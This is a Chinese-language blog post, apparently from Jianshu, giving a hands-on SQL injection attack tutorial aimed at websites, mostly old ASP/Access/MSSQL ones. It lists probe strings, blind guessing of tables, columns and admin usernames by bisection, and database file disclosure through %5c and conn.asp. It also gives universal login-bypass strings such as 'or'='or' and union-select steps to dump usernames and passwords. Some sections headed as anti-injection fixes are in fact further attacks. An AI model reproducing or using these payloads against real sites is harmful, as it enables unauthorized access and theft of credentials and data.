手工注入方法,方便大家測試注入點

1、加入單引號 ’提交,

結果:如果出現(xiàn)錯誤提示,則該網(wǎng)站可能就存在注入漏洞。

2、數(shù)字型判斷是否有注入; 語句:and 1=1 ;and 1=2 (經(jīng)典)、' and '1'=1(字符型)

結果:分別返回不同的頁面,說明存在注入漏洞.

分析:and 的意思是“和”如果沒有過濾我們的語句,and 1=1就會被代入SQL查詢語句進行查詢, 如果and前后的兩條語句都是真的話就不會出錯,但如果前后語句有一個為假的話,程序就會暴錯。 也就表明程序有注入漏洞

防注入解決辦法:

1>使用or 2>1 ; or 1>2來進行判斷

結果:分別返回不同的頁面,說明存在注入漏洞.

分析:or注入只要求前后兩個語句只要有一個正確就為真,如果前后兩個語句都是正確的,反而為假。 記住:or注入時,or后面的語句如果是正確的,則返回錯誤頁面!如果是錯誤,則返回正確頁面 ,說明存在注入點。

2> 使用xor 1=1; xor 1=2

結果:分別返回不同的頁面,說明存在注入漏洞.

分析:xor 代表著異或,意思即連接的表達式僅有一個為真的時候才為真。 記住:xor注入時,xor后面的語句如果是正確的,則返回錯誤頁面積,如果是錯誤,則返回正確 頁面,說明存在注入點。

3>把and 1=1轉換成URL編碼形式后在提交 and 1=1 URL編碼:%41%4E%44%20%%31%3D%31

4>使用-1;-0

分析:如果返回的頁面和前面不同,是另一則新聞,則表示有注入漏洞,是數(shù)字型的注入漏洞;在 URL地址后面加上 -0,URL變成 news.asp?id=123-0,返回的頁面和前面的頁面相同,加上-1,返回錯誤頁面,則也表示存在注入漏洞.

3、字符型判斷是否有注入:

語句:' and '1'=1;' and '1=2(經(jīng)典)

結果:分別返回不同的頁面,說明存在注入漏洞.

分析:加入' and '1'=1返回正確頁面,加入' and '1=2返回錯誤頁面,說明有注入漏同。

防注入解決辦法:

在URL的地址后面加上'%2B'(字符型)

分析:URL地址變?yōu)椋簄ews.asp?id=123'%2B',返回的頁面和1同;加 上'2%2B'asdf,URL地址變?yōu)椋簄ews.asp?id=123'%2Basdf,返回的頁面和1 不同,或者說未發(fā)現(xiàn)該條記錄,或者錯誤,則表示存在注入點,是文本型的。

搜索型判斷是否有注入:

簡單的判斷搜索型注入漏洞存在不存在的辦法是先搜索',如果出錯,說明90%存在這個漏洞。然后搜索%,如果正常返回,說明95%有洞了。

說明:加入如"&"、"["、"]"、"%"、"$"、"@"等特殊字符,都可以實現(xiàn),如果出現(xiàn)錯誤,說明有問題。

操作: 搜索一個關鍵字,比如2006吧,正常返回所有2006相關的信息,再搜索2006%'and 1=1 and '%'='和 2006%'and 1=2 and '%'=',存在異同的話,就是100%有洞了。關鍵字%' and 1=1 and '%'='% 關鍵字%' and 1=2 and '%'='% 將and 1=1 換成注入語句就可以了

判斷數(shù)據(jù)庫類型:

and user>0

例如:showdetail.asp?id=49 ;and user>0 如果是ACCESS數(shù)據(jù)庫,那么返回的錯誤里一般會有"Microsoft JET Database"關鍵定,如果是MSSQL數(shù) 據(jù)庫的話返回的錯誤提示里一般會含有"SQL Server"關鍵了.

猜表名 and exists (select * from 表名)

說明:意思與上面一樣,只是用的語名不一樣。

猜列名 and (select count(列名) from 表名)>0

說明:如果我們輸入的列名猜解正確否反回正常頁面

猜長度 and (select top 1 len(username) from admin)>0

說明:如果我們輸入的最后一位數(shù)據(jù)返回錯誤,而錯誤前一位數(shù)字返回正確,說明我所猜解的長度 為正確。

猜內容 and (select top 1 asc(mid(username,1,1)) from admin)>50 ascii碼1-128

說明:如果我們輸入的最后一位數(shù)據(jù)返回錯誤,而錯誤前一位數(shù)字返回正確,說明我所猜解的數(shù)字正確。(可以使用折半法猜內容)

折半法:最小值與最大值差的一半,比如輸入50返正確,輸入100返回錯誤,折半后輸入75。

兩種常見爆庫

1、%5c

2、conn.asp

%5c暴庫 把二級目錄中間的/換成%5c EY: otherweb ... s.asp?BigClassName=職 責范圍&BigClassType=1 如果你能看到:’E:\ahttc040901 \otherweb\dz\database\iXuEr_Studio.asa’不是一 個有效的 路徑。 確定路徑名稱拼寫是否正確, 以及是否 連接到文件存放的服務器。 這樣的就是數(shù)據(jù)庫了。下載時用FLASHGET換成.MDB格式的就行 .

conn.asp暴庫 這個也是比較老的漏洞,利用價值不大

常見的:'or'='or'萬能密碼登陸

’or’=’or’這是一個可以連接SQL的語名句.可以直接進入后臺。我收集了一下。類似的還有 : ’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’ a’=’a 一個很老的利用方法,主要用于一些比較老的網(wǎng)站。

聯(lián)合查詢注入(union查詢)

操作步驟:

1>在正常語句后臺加入 and 1=2 union select * form 表名,其中*號代表字段數(shù)量,從1一直追加 (and 1=2 union select 1,2,3,4 form 表名)如果字段數(shù)正確就會有暴錯

2>在頁面顯示數(shù)字的地方用真實得到的字段名代替,如:username,password.

3>在頁面字段值處暴出真實的數(shù)據(jù)庫字段值。

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 229,406評論 6 538
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 99,034評論 3 423
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 177,413評論 0 382
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經(jīng)常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 63,449評論 1 316
  • 正文 為了忘掉前任,我火速辦了婚禮,結果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當我...
    茶點故事閱讀 72,165評論 6 410
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 55,559評論 1 325
  • 那天,我揣著相機與錄音,去河邊找鬼。 笑死,一個胖子當著我的面吹牛,可吹牛的內容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 43,606評論 3 444
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 42,781評論 0 289
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 49,327評論 1 335
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 41,084評論 3 356
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 43,278評論 1 371
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 38,849評論 5 362
  • 正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質發(fā)生泄漏。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 44,495評論 3 348
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 34,927評論 0 28
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 36,172評論 1 291
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 52,010評論 3 396
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 48,241評論 2 375

推薦閱讀更多精彩內容

  • 1、加入單引號 ’提交, 結果:如果出現(xiàn)錯誤提示,則該網(wǎng)站可能就存在注入漏洞。 2、數(shù)字型判斷是否有注入;語句:a...
    喜歡吃栗子閱讀 309評論 0 0
  • 姓名:于川皓 學號:16140210089 轉載自:https://baike.baidu.com/item/sq...
    道無涯_cc76閱讀 1,970評論 0 2
  • Android 自定義View的各種姿勢1 Activity的顯示之ViewRootImpl詳解 Activity...
    passiontim閱讀 172,692評論 25 708
  • Sql 注入基礎原理介紹一、實驗說明1.1 實驗內容SQL注入攻擊通過構建特殊的輸入作為參數(shù)傳入Web應用程序,而...
    FreaxJJ閱讀 1,831評論 3 23
  • :一對夫婦在海上為一老板養(yǎng)魚,講好了老板 每月開給這對夫婦五千元的工資,月底發(fā)放, 伙食自理。 老板在海上總共養(yǎng)了...
    48ee6c49c9bf閱讀 605評論 0 0